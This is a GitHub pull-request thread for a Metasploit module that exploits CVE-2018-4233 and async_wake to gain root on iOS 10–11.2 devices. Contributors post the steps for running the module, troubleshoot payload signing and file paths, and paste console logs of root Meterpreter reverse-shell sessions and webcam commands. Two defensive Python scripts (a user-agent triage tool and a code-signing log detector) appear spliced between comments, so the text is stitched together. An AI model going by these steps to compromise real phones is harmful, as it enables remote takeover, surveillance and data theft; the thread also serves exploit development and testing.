CVE-2018-4233 and async_wait for iOS 10 to 11.2 #11477

Merged: 26 commits merged into rapid7:master from timwr:cve_2018_4233_ios_10 on Jun 2, 2019

9 participants
@timwr (Contributor) commented Feb 25, 2019

This demonstrates CVE-2018-4233 on iOS. This should work on all 64-bit iOS 10 -> 11.2 devices.

The WebKit exploit looks up offsets dynamically (thanks to @JakeBlair420 and @Siguza: https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js).

TODO

  • Fix liboffsetfinder64 to support all devices (see offsets.m)
  • Add trust cache injection from @xerub

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/apple_ios/browser/webkit_createthis
  • set LHOST <LHOST>
  • set URIPATH /
  • exploit
  • Verify you get a meterpreter session
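The claim above, "all 64-bit iOS 10 -> 11.2 devices", is the number a defender most wants to turn into an inventory question: which clients hitting my web servers still report an iOS version inside that range? The following is an added Python example, not code from this PR or from Metasploit. It parses the "Requesting <path> from <user agent>" lines in the shape the module prints (the first two sample lines reproduce the shape of lines posted later in this thread, the last two are constructed), extracts the iOS version from the Safari user agent, and reports clients inside the claimed range. The range bounds are an assumption drawn from the PR text (10.0 through every 11.2 point release, 11.3 excluded); they describe what this module claims to cover, not every build affected by CVE-2018-4233.

```python
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int]

# Version range this PR claims the module covers: iOS 10.0 up to 11.2.
# Assumption: every 11.2 point release is inside the range and 11.3 is outside it.
CLAIMED_MIN: Version = (10, 0, 0)
CLAIMED_UPPER_EXCLUSIVE: Version = (11, 3, 0)

# Safari on iOS reports "CPU iPhone OS 10_3_2" (iPhone) or "CPU OS 10_3_1" (iPad).
IOS_UA_RE = re.compile(r"CPU (?:iPhone )?OS (\d+)_(\d+)(?:_(\d+))? like Mac OS X")

# Shape of the "Requesting <path> from <user agent>" lines the module prints.
MODULE_LINE_RE = re.compile(
    r"^\[[*+\-]\] (?P<ip>\S+)\s+webkit_createthis - Requesting (?P<path>\S+) from (?P<ua>.+)$"
)

# Constructed sample input. The first two lines mirror lines posted in this thread;
# the last two are made up (a patched device and a non-iOS client).
SAMPLE_LINES = [
    "[*] 192.168.40.10 webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1",
    "[*] 192.168.1.5      webkit_createthis - Requesting / from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1",
    "[*] 10.0.0.7         webkit_createthis - Requesting / from Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1",
    "[*] 10.0.0.8         webkit_createthis - Requesting / from Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0 Safari/537.36",
]


def ios_version_from_ua(user_agent: str) -> Optional[Version]:
    """Return (major, minor, patch) from an iOS Safari user agent, or None if it is not iOS."""
    m = IOS_UA_RE.search(user_agent)
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def in_claimed_range(version: Version) -> bool:
    """True when the version lies inside the range this PR claims to cover."""
    return CLAIMED_MIN <= version < CLAIMED_UPPER_EXCLUSIVE


def triage_module_log(lines: List[str]) -> List[Dict[str, object]]:
    """One row per request line: client IP, path, parsed iOS version, and range verdict."""
    rows: List[Dict[str, object]] = []
    for line in lines:
        m = MODULE_LINE_RE.match(line)
        if not m:
            continue  # handler/banner lines carry no client information
        version = ios_version_from_ua(m["ua"])
        rows.append({
            "ip": m["ip"],
            "path": m["path"],
            "ios": version,
            "in_range": version is not None and in_claimed_range(version),
        })
    return rows


def exposed_hosts(lines: List[str]) -> Dict[str, Version]:
    """Client IPs whose reported iOS version falls inside the claimed range, with that version."""
    hosts: Dict[str, Version] = {}
    for row in triage_module_log(lines):
        if row["in_range"]:
            hosts[str(row["ip"])] = row["ios"]  # type: ignore[assignment]
    return hosts


if __name__ == "__main__":
    for ip, ver in exposed_hosts(SAMPLE_LINES).items():
        print(f"{ip}: iOS {'.'.join(map(str, ver))} is inside the range this module targets")
```

Two caveats a practitioner should keep in mind: the user agent says nothing about whether the device is 64-bit, so a 32-bit iPhone on iOS 10.3 is flagged even though the PR limits itself to 64-bit hardware, and the user agent is client-supplied, so the check is an inventory aid rather than proof of anything.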

@timwr timwr added the ios label Feb 25, 2019

@timwr timwr marked this pull request as ready for review Feb 27, 2019

@Huan2gao commented Mar 8, 2019

Hello, I tried this on iPhone OS 10.3.2. Everything happens fine:

[*] 192.168.40.10 webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1
[+] 192.168.40.10 webkit_createthis - Sent async_wake exploit

but after this I'm not able to get a shell. Please help me out. Thanks.

@timwr timwr force-pushed the timwr:cve_2018_4233_ios_10 branch from 9032bd0 to a404e62 Mar 8, 2019

@timwr (Contributor, Author) commented Mar 8, 2019

@Huan2gao I just pushed a few fixes, can you try again please? Do you see anything in the logs? Crash reports?

@timwr (Contributor, Author) commented Mar 8, 2019

Oops, you also need to put a sha1-signed copy of mettle.dylib at metasploit-framework/data/mettle/aarch64-iphone-darwin/bin/mettle.dylib, e.g.:

jtool --sign sha1 --inplace mettle.dylib

@Huan2gao commented Mar 14, 2019

Thanks for helping me, but now a new issue has come up:
Mar 14 17:52:37 kutsuakirahiroshis-iPhone amfid[179] : /private/var/mobile/mettle.dylib not valid: 0xe800801c: No code signature found.
Mar 14 17:52:37 kutsuakirahiroshis-iPhone kernel(AppleMobileFileIntegrity)[0] : AMFI: code signature validation failed.
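The two lines above are exactly the signal a defender would alert on: amfid rejecting a Mach-O in user-writable storage because it carries no code signature, followed by the kernel-side AMFI verdict. The following is an added Python example, not code from this PR, from Metasploit, or from Apple. It parses syslog lines in the shape shown above, pairs each amfid rejection with the kernel AMFI failure that follows it on the same host, and rates the path by whether it sits in a user-writable location. The two rejection lines are copied from the comment above; the third sample line is constructed so the parser has something to ignore, and the writable-path prefixes are an assumption of this example.

```python
import re
from dataclasses import dataclass
from typing import List

# Sample input. The first two lines are the ones posted in this thread; the third is
# constructed and unrelated, so the parser has something to skip.
SAMPLE_SYSLOG = """\
Mar 14 17:52:37 kutsuakirahiroshis-iPhone amfid[179] : /private/var/mobile/mettle.dylib not valid: 0xe800801c: No code signature found.
Mar 14 17:52:37 kutsuakirahiroshis-iPhone kernel(AppleMobileFileIntegrity)[0] : AMFI: code signature validation failed.
Mar 14 17:52:40 kutsuakirahiroshis-iPhone SpringBoard[57] : (constructed) unrelated message
"""

# "<Mon DD HH:MM:SS> <host> <process>[<pid>] : <message>"; the process field may contain
# parentheses, as in kernel(AppleMobileFileIntegrity), so it is matched non-greedily.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) (?P<proc>\S+?)\[(?P<pid>\d+)\] : (?P<msg>.*)$"
)
# amfid's rejection message: "<path> not valid: <hex code>: <reason>"
AMFID_REJECT_RE = re.compile(r"^(?P<path>\S+) not valid: (?P<code>0x[0-9a-fA-F]+): (?P<reason>.*)$")
KERNEL_AMFI_FAIL = "AMFI: code signature validation failed."

# Assumption of this example: anything amfid rejects under these prefixes was written at
# runtime by a user or an app, which is worth a higher severity than a system path.
WRITABLE_PREFIXES = ("/private/var/", "/var/", "/private/tmp/", "/tmp/")


@dataclass
class Event:
    ts: str
    host: str
    proc: str
    pid: int
    msg: str


@dataclass
class Alert:
    ts: str
    host: str
    path: str
    code: str
    reason: str
    severity: str
    kernel_confirmed: bool


def parse_syslog(text: str) -> List[Event]:
    """Parse every line that matches the syslog shape; lines that do not match are dropped."""
    events: List[Event] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(Event(m["ts"], m["host"], m["proc"], int(m["pid"]), m["msg"]))
    return events


def find_unsigned_code_loads(text: str, window: int = 5) -> List[Alert]:
    """One alert per amfid rejection, flagged as kernel-confirmed when the AMFI failure
    message appears within the next `window` events from the same host."""
    events = parse_syslog(text)
    alerts: List[Alert] = []
    for i, ev in enumerate(events):
        if ev.proc != "amfid":
            continue
        m = AMFID_REJECT_RE.match(ev.msg)
        if not m:
            continue
        confirmed = any(
            later.host == ev.host
            and later.proc.startswith("kernel(AppleMobileFileIntegrity)")
            and later.msg == KERNEL_AMFI_FAIL
            for later in events[i + 1:i + 1 + window]
        )
        severity = "high" if m["path"].startswith(WRITABLE_PREFIXES) else "medium"
        alerts.append(Alert(ev.ts, ev.host, m["path"], m["code"].lower(), m["reason"], severity, confirmed))
    return alerts


if __name__ == "__main__":
    for a in find_unsigned_code_loads(SAMPLE_SYSLOG):
        print(f"[{a.severity}] {a.ts} {a.host}: amfid rejected {a.path} ({a.code}: {a.reason}) "
              f"kernel_confirmed={a.kernel_confirmed}")
```

The rejection itself means the platform did its job; the reason to alert is that something already running on the device tried to load unsigned native code from user storage, which is the post-exploitation step this thread is debugging. A follow-up rejection that suddenly stops appearing (because the file was later signed, as the next comments describe) is the case a detection engineer should expect and plan around: the load attempt, not only the failure, is the event of interest.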

@timwr timwr force-pushed the timwr:cve_2018_4233_ios_10 branch from a404e62 to 98a2237 Mar 14, 2019

@TheBrokenWasp commented Mar 16, 2019

Hello, I was just trying this out. I don't really know how it works, but I got this error:

[*] 192.168.1.5      webkit_createthis - Requesting / from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[*] 192.168.1.5      webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[-] 192.168.1.5      webkit_createthis - Exception handling request: No such file or directory @ rb_sysopen - D:/metasploit-framework/embedded/framework/data/exploits/CVE-2018-4243/exploit

Any ideas? I'm using the Windows version, by the way, and trying the exploit on my 10.3.1 iPad mini 2 (64-bit)... I tried finding the file it said didn't exist in the pull request branch, but it's not there either :(

@timwr (Contributor, Author) commented Mar 16, 2019

Are you sure you're testing the right version (89f8cae)?
When I try to reproduce with curl (using your user agent) I get this:

curl -H"User-Agent:Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1" http://192.168.1.5:8080/exploit

[*] 192.168.1.5   webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[+] 192.168.1.5   webkit_createthis - Sent async_wake exploit

@TheBrokenWasp commented Mar 17, 2019

When (if ever) will iOS 11 support be added to this?

@timwr (Contributor, Author) commented Mar 17, 2019

I'll start adding it when this pull request is tested and landed. Your device is iOS 10 so it should work. Can you test again please?

@TheBrokenWasp commented Mar 17, 2019

@timwr I would if I could either 1. install the pull request on Windows somehow or 2. figure out how to install ParrotOS on my USB :/

@TheBrokenWasp commented Mar 17, 2019

By the way, will you add this to browser autopwn?

@wvu-r7 (Contributor) commented Mar 17, 2019

That's not a bad idea. I'd use BES and BAP 2.

@TheBrokenWasp commented Mar 18, 2019

I once again tried this while getting every single file that might be missing, and I got all of the requirements. Now it says a file that isn't supposed to exist is needed?

[*] Starting persistent handler(s)...
msf5 >
msf5 > use exploit/apple_ios/browser/webkit_createthis
msf5 exploit(apple_ios/browser/webkit_createthis) > set LHOST 192.168.1.9
LHOST => 192.168.1.9
msf5 exploit(apple_ios/browser/webkit_createthis) > set URIPATH /
URIPATH => /
msf5 exploit(apple_ios/browser/webkit_createthis) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/webkit_createthis) >
[*] Started reverse TCP handler on 192.168.1.9:4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.9:8080/
[*] Server started.
[*] 192.168.1.5      webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[+] 192.168.1.5      webkit_createthis - Sent async_wake exploit
[*] 192.168.1.5      webkit_createthis - Requesting / from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[*] 192.168.1.5      webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[+] 192.168.1.5      webkit_createthis - Sent async_wake exploit
[*] 192.168.1.5      webkit_createthis - Requesting / from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[*] 192.168.1.5      webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[+] 192.168.1.5      webkit_createthis - Sent async_wake exploit
[-] 192.168.1.5      webkit_createthis - Exception handling request: No such file or directory @ rb_sysopen - D:/metasploit-framework/embedded/framework/data/mettle/aarch64-iphone-darwin/bin/mettle.dylib

@timwr (Contributor, Author) commented Mar 20, 2019

@TheBrokenWasp apologies, I've pushed the missing file (it's a sha1-signed mettle.dylib).
I'll try to find a way of signing it as part of the mettle build (or dynamically within the framework).

@TheBrokenWasp commented Mar 21, 2019

So I got a session, but it doesn't work :/

msf5 exploit(apple_ios/browser/webkit_createthis) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/webkit_createthis) >
[*] Started reverse TCP handler on 192.168.1.9:4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.9:8080/
[*] Server started.
[*] 192.168.1.5      webkit_createthis - Requesting / from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[*] 192.168.1.5      webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[+] 192.168.1.5      webkit_createthis - Sent async_wake exploit
[+] 192.168.1.5      webkit_createthis - Sent payload
[*] Meterpreter session 1 opened (192.168.1.9:4444 -> 192.168.1.5:53624) at 2019-03-21 18:17:24 -0400

msf5 exploit(apple_ios/browser/webkit_createthis) > sessions

Active sessions
===============

  Id  Name  Type                           Information                                 Connection
  --  ----  ----                           -----------                                 ----------
  1         meterpreter aarch64/apple_ios  uid=0, gid=0, euid=0, egid=0 @ 192.168.1.5  192.168.1.9:4444 -> 192.168.1.5:53624 (192.168.1.5)

msf5 exploit(apple_ios/browser/webkit_createthis) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    chmod         Change the permissions of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    shell         Drop into a system command shell
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk

meterpreter > webcam_list
[-] Error running command webcam_list: Rex::TimeoutError Operation timed out.
meterpreter >
meterpreter > webcam_snap
[-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.
meterpreter > sysinfo
[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.
meterpreter >
[*] 192.168.1.5 - Meterpreter session 1 closed.  Reason: Died

@TheBrokenWasp commented Mar 21, 2019

I tried again and it worked for like 30 sec, then died again... It's not a very stable meterpreter

@timwr (Contributor, Author) commented Mar 22, 2019

For some reason the webcam_* commands kill the session if it's within the Safari process.

@TheBrokenWasp commented Mar 22, 2019

For some reason the webcam_* commands kill the session if it's within the Safari process.

Is there a way to migrate to a different process in iOS?

@timwr timwr force-pushed the timwr:cve_2018_4233_ios_10 branch from fe8bf98 to 59d5488 Apr 3, 2019

@timwr (Contributor, Author) commented Apr 3, 2019

Apologies for the delay. @TheBrokenWasp migration would be awesome but I'm not currently working on it. I think we can have some kind of persistence (until the phone reboots, but after Safari exits) without migration.

I've added support for iOS 11 (up to 11.2) but I've only got 1 device to test on. I've also added an offset cache that should speed up the initial javascript exploitation.

@timwr timwr changed the title Initial commit of CVE-2018-4233 for iOS 10 CVE-2018-4233 and async_wait for iOS 10 to 11.2 Apr 13, 2019

@Gr0minet commented Apr 15, 2019

Hello,
It works on iPhone 5s with iOS 10.2.1 👍

msf5 exploit(apple_ios/browser/webkit_createthis) > set LHOST 192.168.1.51
LHOST => 192.168.1.51
msf5 exploit(apple_ios/browser/webkit_createthis) > set URIPATH /
URIPATH => /
msf5 exploit(apple_ios/browser/webkit_createthis) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/webkit_createthis) > 
[*] Started reverse TCP handler on 192.168.1.51:4444 
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.51:8080/
[*] Server started.
[*] 192.168.1.34     webkit_createthis - Requesting / from Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1
[*] 192.168.1.34     webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1
[+] 192.168.1.34     webkit_createthis - Sent async_wake exploit
[+] 192.168.1.34     webkit_createthis - Sent sha1 iOS 10 payload
[*] Meterpreter session 1 opened (192.168.1.51:4444 -> 192.168.1.34:49211) at 2019-04-15 11:34:01 +0200

msf5 exploit(apple_ios/browser/webkit_createthis) > sessions

Active sessions
===============

  Id  Name  Type                           Information                                  Connection
  --  ----  ----                           -----------                                  ----------
  1         meterpreter aarch64/apple_ios  uid=0, gid=0, euid=0, egid=0 @ 192.168.1.34  192.168.1.51:4444 -> 192.168.1.34:49211 (192.168.1.34)

msf5 exploit(apple_ios/browser/webkit_createthis) > sessions 1
[*] Starting interaction with 1...

meterpreter > pwd
/System/Library/Frameworks/WebKit.framework/XPCServices/com.apple.WebKit.WebContent.xpc

@timwr (Contributor, Author) commented Apr 15, 2019

Thanks for testing @Gr0minet!
Would you mind adding the offsets please?
You just run the exploit after running set DUMP_OFFSETS true and add the output here:
https://github.com/rapid7/metasploit-framework/pull/11477/files#diff-c863bef6a4ff1e4ccdc27c413ef3f922R455

It should speed up the initial exploit.

I'll add some documentation asap and ensure the mettle repo can produce a sha256 signed dylib.

@timwr timwr force-pushed the timwr:cve_2018_4233_ios_10 branch from 542d612 to 18c825d Jun 2, 2019

@busterb busterb merged commit 18c825d into rapid7:master Jun 2, 2019

1 of 3 checks passed:

  • Metasploit Automation - Sanity Test Execution: Failed to pass tests.
  • continuous-integration/travis-ci/pr: The Travis CI build is in progress.
  • Metasploit Automation - Test Execution: Successfully completed all tests.

busterb added a commit that referenced this pull request Jun 2, 2019

@busterb (Member) commented Jun 2, 2019

Release Notes

An exploit module for CVE-2018-4233 on iOS is now available. It will work on all 64-bit iOS 10-11.2 devices.

jmartin-r7 added a commit that referenced this pull request Jun 2, 2019

@tdoan-r7 tdoan-r7 added the rn-modules label Jun 11, 2019
